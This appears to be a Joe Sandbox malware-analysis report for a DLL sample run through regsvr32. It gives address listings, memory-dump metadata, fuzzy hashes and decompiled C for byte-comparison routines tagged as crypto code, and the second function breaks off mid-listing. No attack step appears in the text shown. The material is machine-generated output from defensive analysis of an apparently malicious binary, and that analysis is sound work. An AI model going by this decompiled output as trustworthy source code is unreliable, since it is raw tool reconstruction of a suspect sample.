                                                                                                            0x10022292
                                                                                                            0x10022294
                                                                                                            0x100222ab
                                                                                                            0x100222b3
                                                                                                            0x100222b5
                                                                                                            0x100222cc
                                                                                                            0x100222d4
                                                                                                            0x100222d6
                                                                                                            0x100222ed
                                                                                                            0x100222f5
                                                                                                            0x100222f7
                                                                                                            0x10022304
                                                                                                            0x10022304
                                                                                                            0x00000000
                                                                                                            0x100222f7
                                                                                                            0x100222e3
                                                                                                            0x100222e7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100222e7
                                                                                                            0x100222c2
                                                                                                            0x100222c6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100222c6
                                                                                                            0x100222a1
                                                                                                            0x100222a5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100222a5
                                                                                                            0x10022203
                                                                                                            0x10022205
                                                                                                            0x1002221c
                                                                                                            0x10022224
                                                                                                            0x10022226
                                                                                                            0x1002223d
                                                                                                            0x10022245
                                                                                                            0x10022247
                                                                                                            0x1002225e
                                                                                                            0x10022266
                                                                                                            0x10022268
                                                                                                            0x10022275
                                                                                                            0x10022275
                                                                                                            0x00000000
                                                                                                            0x10022268
                                                                                                            0x10022254
                                                                                                            0x10022258
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022258
                                                                                                            0x10022233
                                                                                                            0x10022237
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022237
                                                                                                            0x10022212
                                                                                                            0x10022216
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002216c
                                                                                                            0x1002216c
                                                                                                            0x10022170
                                                                                                            0x10022174
                                                                                                            0x10022176
                                                                                                            0x1002218d
                                                                                                            0x1002218d
                                                                                                            0x10022191
                                                                                                            0x10022195
                                                                                                            0x10022197
                                                                                                            0x100221ae
                                                                                                            0x100221ae
                                                                                                            0x100221b2
                                                                                                            0x100221b6
                                                                                                            0x100221b8
                                                                                                            0x100221cf
                                                                                                            0x100221cf
                                                                                                            0x100221d3
                                                                                                            0x100221d7
                                                                                                            0x100221d9
                                                                                                            0x100221df
                                                                                                            0x100221e2
                                                                                                            0x100221e6
                                                                                                            0x100221e6
                                                                                                            0x00000000
                                                                                                            0x100221d9
                                                                                                            0x100221be
                                                                                                            0x100221c1
                                                                                                            0x100221c5
                                                                                                            0x100221c9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100221c9
                                                                                                            0x1002219d
                                                                                                            0x100221a0
                                                                                                            0x100221a4
                                                                                                            0x100221a8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100221a8
                                                                                                            0x1002217c
                                                                                                            0x1002217f
                                                                                                            0x10022183
                                                                                                            0x10022187
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022187
                                                                                                            0x1002155d
                                                                                                            0x1002155d
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                            • Instruction ID: 96d822cc69aa3fc93da2d15b1563b91117c73107614f1685f50044f1bcfdd119
                                                                                                            • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                            • Instruction Fuzzy Hash: 17D1B573C0A9F3968775C16D646826EEEE2AFD258039BC3E0DCE43F289D2279D1495D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021D44 Relevance: .4, Instructions: 378COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10021D44(void* __eax, void* __ecx) {
				void* _t191;
				signed int _t192;
				void* _t195;
				signed char _t201;
				signed char _t202;
				signed char _t203;
				signed char _t204;
				signed char _t206;
				signed int _t211;
				signed int _t309;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t342;
				void* _t344;
				void* _t346;
				void* _t349;
				void* _t351;
				void* _t353;

				_t195 = __ecx;
				_t191 = __eax;
				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
					_t309 = 0;
					L15:
					if(_t309 != 0) {
						goto L1;
					}
					_t201 =  *(_t191 - 0x1a);
					if(_t201 ==  *(_t195 - 0x1a)) {
						_t309 = 0;
						L26:
						if(_t309 != 0) {
							goto L1;
						}
						_t202 =  *(_t191 - 0x16);
						if(_t202 ==  *(_t195 - 0x16)) {
							_t309 = 0;
							L37:
							if(_t309 != 0) {
								goto L1;
							}
							_t203 =  *(_t191 - 0x12);
							if(_t203 ==  *(_t195 - 0x12)) {
								_t309 = 0;
								L48:
								if(_t309 != 0) {
									goto L1;
								}
								_t204 =  *(_t191 - 0xe);
								if(_t204 ==  *(_t195 - 0xe)) {
									_t309 = 0;
									L59:
									if(_t309 != 0) {
										goto L1;
									}
									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
										_t309 = 0;
										L70:
										if(_t309 != 0) {
											goto L1;
										}
										_t206 =  *(_t191 - 6);
										if(_t206 ==  *(_t195 - 6)) {
											_t309 = 0;
											L81:
											if(_t309 != 0) {
												goto L1;
											}
											if( *(_t191 - 2) ==  *(_t195 - 2)) {
												_t192 = 0;
												L3:
												return _t192;
											}
											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
											if(_t312 == 0) {
												L4:
												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
												if(_t192 != 0) {
													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
												}
												goto L3;
											}
											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
											if(_t211 != 0) {
												_t192 = _t211;
												goto L3;
											}
											goto L4;
										}
										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
										if(_t314 == 0) {
											L74:
											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
											if(_t316 == 0) {
												L76:
												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
												if(_t318 == 0) {
													L78:
													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
													if(_t309 != 0) {
														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
													}
													goto L81;
												}
												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
												if(_t309 != 0) {
													goto L1;
												}
												goto L78;
											}
											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L76;
										}
										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L74;
									}
									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
									if(_t321 == 0) {
										L63:
										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
										if(_t323 == 0) {
											L65:
											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
											if(_t325 == 0) {
												L67:
												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
												if(_t309 != 0) {
													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
												}
												goto L70;
											}
											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t309 != 0) {
												goto L1;
											}
											goto L67;
										}
										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L65;
									}
									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L63;
								}
								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
								if(_t328 == 0) {
									L52:
									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
									if(_t330 == 0) {
										L54:
										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
										if(_t332 == 0) {
											L56:
											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
											if(_t309 != 0) {
												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
											}
											goto L59;
										}
										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t309 != 0) {
											goto L1;
										}
										goto L56;
									}
									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L54;
								}
								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L52;
							}
							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
							if(_t335 == 0) {
								L41:
								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
								if(_t337 == 0) {
									L43:
									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
									if(_t339 == 0) {
										L45:
										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
										if(_t309 != 0) {
											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
										}
										goto L48;
									}
									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t309 != 0) {
										goto L1;
									}
									goto L45;
								}
								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L43;
							}
							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L41;
						}
						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
						if(_t342 == 0) {
							L30:
							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
							if(_t344 == 0) {
								L32:
								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
								if(_t346 == 0) {
									L34:
									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
									if(_t309 != 0) {
										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
									}
									goto L37;
								}
								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t309 != 0) {
									goto L1;
								}
								goto L34;
							}
							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L32;
						}
						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L30;
					}
					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
					if(_t349 == 0) {
						L19:
						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
						if(_t351 == 0) {
							L21:
							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
							if(_t353 == 0) {
								L23:
								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
								if(_t309 != 0) {
									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								}
								goto L26;
							}
							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t309 != 0) {
								goto L1;
							}
							goto L23;
						}
						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t309 != 0) {
							goto L1;
						}
						goto L21;
					}
					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
					if(_t309 != 0) {
						goto L1;
					}
					goto L19;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1e) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
					if(__esi == 0) {
						L8:
						__esi =  *(__eax - 0x1d) & 0x000000ff;
						__edx =  *(__ecx - 0x1d) & 0x000000ff;
						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
						if(__esi == 0) {
							L10:
							__esi =  *(__eax - 0x1c) & 0x000000ff;
							__edx =  *(__ecx - 0x1c) & 0x000000ff;
							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
							if(__esi == 0) {
								L12:
								__esi =  *(__eax - 0x1b) & 0x000000ff;
								__edx =  *(__ecx - 0x1b) & 0x000000ff;
								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L15;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L12;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L10;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L8;
				}
				L1:
				_t192 = _t309;
				goto L3;
			}
































                                                                                                            0x10021d44
                                                                                                            0x10021d44
                                                                                                            0x10021d4a
                                                                                                            0x10021dc9
                                                                                                            0x10021dcb
                                                                                                            0x10021dcd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021dd3
                                                                                                            0x10021dd9
                                                                                                            0x10021e58
                                                                                                            0x10021e5a
                                                                                                            0x10021e5c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021e62
                                                                                                            0x10021e68
                                                                                                            0x10021ee7
                                                                                                            0x10021ee9
                                                                                                            0x10021eeb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021ef1
                                                                                                            0x10021ef7
                                                                                                            0x10021f76
                                                                                                            0x10021f78
                                                                                                            0x10021f7a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021f80
                                                                                                            0x10021f86
                                                                                                            0x10022005
                                                                                                            0x10022007
                                                                                                            0x10022009
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022015
                                                                                                            0x10022095
                                                                                                            0x10022097
                                                                                                            0x10022099
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002209f
                                                                                                            0x100220a5
                                                                                                            0x10022124
                                                                                                            0x10022126
                                                                                                            0x10022128
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022136
                                                                                                            0x10021930
                                                                                                            0x10021932
                                                                                                            0x1002268e
                                                                                                            0x1002268e
                                                                                                            0x10022144
                                                                                                            0x10022146
                                                                                                            0x10021d22
                                                                                                            0x10021d2a
                                                                                                            0x10021d2c
                                                                                                            0x10021d3d
                                                                                                            0x10021d3d
                                                                                                            0x00000000
                                                                                                            0x10021d2c
                                                                                                            0x10022153
                                                                                                            0x10022159
                                                                                                            0x10022572
                                                                                                            0x00000000
                                                                                                            0x10022572
                                                                                                            0x00000000
                                                                                                            0x1002215f
                                                                                                            0x100220ae
                                                                                                            0x100220b0
                                                                                                            0x100220c7
                                                                                                            0x100220cf
                                                                                                            0x100220d1
                                                                                                            0x100220e8
                                                                                                            0x100220f0
                                                                                                            0x100220f2
                                                                                                            0x10022109
                                                                                                            0x10022111
                                                                                                            0x10022113
                                                                                                            0x10022120
                                                                                                            0x10022120
                                                                                                            0x00000000
                                                                                                            0x10022113
                                                                                                            0x100220ff
                                                                                                            0x10022103
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022103
                                                                                                            0x100220de
                                                                                                            0x100220e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100220e2
                                                                                                            0x100220bd
                                                                                                            0x100220c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100220c1
                                                                                                            0x1002201f
                                                                                                            0x10022021
                                                                                                            0x10022038
                                                                                                            0x10022040
                                                                                                            0x10022042
                                                                                                            0x10022059
                                                                                                            0x10022061
                                                                                                            0x10022063
                                                                                                            0x1002207a
                                                                                                            0x10022082
                                                                                                            0x10022084
                                                                                                            0x10022091
                                                                                                            0x10022091
                                                                                                            0x00000000
                                                                                                            0x10022084
                                                                                                            0x10022070
                                                                                                            0x10022074
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022074
                                                                                                            0x1002204f
                                                                                                            0x10022053
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022053
                                                                                                            0x1002202e
                                                                                                            0x10022032
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022032
                                                                                                            0x10021f8f
                                                                                                            0x10021f91
                                                                                                            0x10021fa8
                                                                                                            0x10021fb0
                                                                                                            0x10021fb2
                                                                                                            0x10021fc9
                                                                                                            0x10021fd1
                                                                                                            0x10021fd3
                                                                                                            0x10021fea
                                                                                                            0x10021ff2
                                                                                                            0x10021ff4
                                                                                                            0x10022001
                                                                                                            0x10022001
                                                                                                            0x00000000
                                                                                                            0x10021ff4
                                                                                                            0x10021fe0
                                                                                                            0x10021fe4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021fe4
                                                                                                            0x10021fbf
                                                                                                            0x10021fc3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021fc3
                                                                                                            0x10021f9e
                                                                                                            0x10021fa2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021fa2
                                                                                                            0x10021f00
                                                                                                            0x10021f02
                                                                                                            0x10021f19
                                                                                                            0x10021f21
                                                                                                            0x10021f23
                                                                                                            0x10021f3a
                                                                                                            0x10021f42
                                                                                                            0x10021f44
                                                                                                            0x10021f5b
                                                                                                            0x10021f63
                                                                                                            0x10021f65
                                                                                                            0x10021f72
                                                                                                            0x10021f72
                                                                                                            0x00000000
                                                                                                            0x10021f65
                                                                                                            0x10021f51
                                                                                                            0x10021f55
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021f55
                                                                                                            0x10021f30
                                                                                                            0x10021f34
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021f34
                                                                                                            0x10021f0f
                                                                                                            0x10021f13
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021f13
                                                                                                            0x10021e71
                                                                                                            0x10021e73
                                                                                                            0x10021e8a
                                                                                                            0x10021e92
                                                                                                            0x10021e94
                                                                                                            0x10021eab
                                                                                                            0x10021eb3
                                                                                                            0x10021eb5
                                                                                                            0x10021ecc
                                                                                                            0x10021ed4
                                                                                                            0x10021ed6
                                                                                                            0x10021ee3
                                                                                                            0x10021ee3
                                                                                                            0x00000000
                                                                                                            0x10021ed6
                                                                                                            0x10021ec2
                                                                                                            0x10021ec6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021ec6
                                                                                                            0x10021ea1
                                                                                                            0x10021ea5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021ea5
                                                                                                            0x10021e80
                                                                                                            0x10021e84
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021e84
                                                                                                            0x10021de2
                                                                                                            0x10021de4
                                                                                                            0x10021dfb
                                                                                                            0x10021e03
                                                                                                            0x10021e05
                                                                                                            0x10021e1c
                                                                                                            0x10021e24
                                                                                                            0x10021e26
                                                                                                            0x10021e3d
                                                                                                            0x10021e45
                                                                                                            0x10021e47
                                                                                                            0x10021e54
                                                                                                            0x10021e54
                                                                                                            0x00000000
                                                                                                            0x10021e47
                                                                                                            0x10021e33
                                                                                                            0x10021e37
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021e37
                                                                                                            0x10021e12
                                                                                                            0x10021e16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021e16
                                                                                                            0x10021df1
                                                                                                            0x10021df5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021d4c
                                                                                                            0x10021d4c
                                                                                                            0x10021d4f
                                                                                                            0x10021d53
                                                                                                            0x10021d55
                                                                                                            0x10021d6c
                                                                                                            0x10021d6c
                                                                                                            0x10021d70
                                                                                                            0x10021d74
                                                                                                            0x10021d76
                                                                                                            0x10021d8d
                                                                                                            0x10021d8d
                                                                                                            0x10021d91
                                                                                                            0x10021d95
                                                                                                            0x10021d97
                                                                                                            0x10021dae
                                                                                                            0x10021dae
                                                                                                            0x10021db2
                                                                                                            0x10021db6
                                                                                                            0x10021db8
                                                                                                            0x10021dbe
                                                                                                            0x10021dc1
                                                                                                            0x10021dc5
                                                                                                            0x10021dc5
                                                                                                            0x00000000
                                                                                                            0x10021db8
                                                                                                            0x10021d9d
                                                                                                            0x10021da0
                                                                                                            0x10021da4
                                                                                                            0x10021da8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021da8
                                                                                                            0x10021d7c
                                                                                                            0x10021d7f
                                                                                                            0x10021d83
                                                                                                            0x10021d87
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021d87
                                                                                                            0x10021d5b
                                                                                                            0x10021d5e
                                                                                                            0x10021d62
                                                                                                            0x10021d66
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021d66
                                                                                                            0x1002155d
                                                                                                            0x1002155d
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                            • Instruction ID: 276cb039fe08e2f6a1b1f29b540f17a99a8123dd2147ace181feb278aaef99e0
                                                                                                            • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                            • Instruction Fuzzy Hash: E8D19177C0A9F38A8775C12D646826EEEE2AFD159039BC3E1DCE43F289D6279D0095D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021938 Relevance: .4, Instructions: 361COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10021938(void* __eax, void* __ecx) {
				void* _t183;
				signed int _t184;
				void* _t187;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t296;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t334;
				void* _t336;
				void* _t338;

				_t187 = __ecx;
				_t183 = __eax;
				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
					_t296 = 0;
					L12:
					if(_t296 != 0) {
						goto L1;
					}
					_t193 =  *(_t183 - 0x19);
					if(_t193 ==  *(_t187 - 0x19)) {
						_t296 = 0;
						L23:
						if(_t296 != 0) {
							goto L1;
						}
						_t194 =  *(_t183 - 0x15);
						if(_t194 ==  *(_t187 - 0x15)) {
							_t296 = 0;
							L34:
							if(_t296 != 0) {
								goto L1;
							}
							_t195 =  *(_t183 - 0x11);
							if(_t195 ==  *(_t187 - 0x11)) {
								_t296 = 0;
								L45:
								if(_t296 != 0) {
									goto L1;
								}
								_t196 =  *(_t183 - 0xd);
								if(_t196 ==  *(_t187 - 0xd)) {
									_t296 = 0;
									L56:
									if(_t296 != 0) {
										goto L1;
									}
									if( *(_t183 - 9) ==  *(_t187 - 9)) {
										_t296 = 0;
										L67:
										if(_t296 != 0) {
											goto L1;
										}
										_t198 =  *(_t183 - 5);
										if(_t198 ==  *(_t187 - 5)) {
											_t296 = 0;
											L78:
											if(_t296 != 0) {
												goto L1;
											}
											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
											if(_t184 != 0) {
												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
											}
											L2:
											return _t184;
										}
										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
										if(_t299 == 0) {
											L71:
											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
											if(_t301 == 0) {
												L73:
												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
												if(_t303 == 0) {
													L75:
													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
													if(_t296 != 0) {
														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
												if(_t296 != 0) {
													goto L1;
												}
												goto L75;
											}
											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
